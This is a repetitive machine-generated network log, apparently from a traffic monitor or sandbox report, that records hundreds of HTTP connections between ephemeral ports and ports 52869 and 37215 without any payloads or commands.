Source: unknown	Network traffic detected: HTTP traffic on port 42938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59502
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44220 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42792 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37900 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36894 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
